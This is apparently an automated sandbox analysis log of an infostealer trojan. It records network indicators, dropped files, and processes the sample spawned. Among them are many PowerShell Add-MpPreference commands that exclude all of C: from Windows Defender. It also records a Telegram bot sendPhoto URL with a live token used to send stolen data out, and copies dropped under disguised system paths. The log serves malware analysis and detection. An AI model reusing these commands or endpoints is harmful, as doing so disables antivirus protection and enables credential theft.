0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: powershell.exeProcess created: 44
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848DF0D670_2_00007FF848DF0D67
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848FA074D0_2_00007FF848FA074D
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848FA5FF50_2_00007FF848FA5FF5
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeCode function: 53_2_00007FF848E20D6753_2_00007FF848E20D67
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ArFrORkS.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257666854.000000001B332000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.csCryptographic APIs: 'CreateDecryptor'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.csCryptographic APIs: 'CreateDecryptor'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.csCryptographic APIs: 'CreateDecryptor'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/164@2/4
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\fTGLCVSM.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMutant created: \Sessions\1\BaseNamedObjects\Local\db37e7674e0c9c73d718eed222877e169116f5b2c083f00aedc6dc96849528f8
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\AppData\Local\Temp\ZQ41MPITjVJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 0L4O4hE8bk.36.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile read: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: unknownProcess created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: unknownProcess created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
                            Source: unknownProcess created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
                            Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                            Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" Jump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
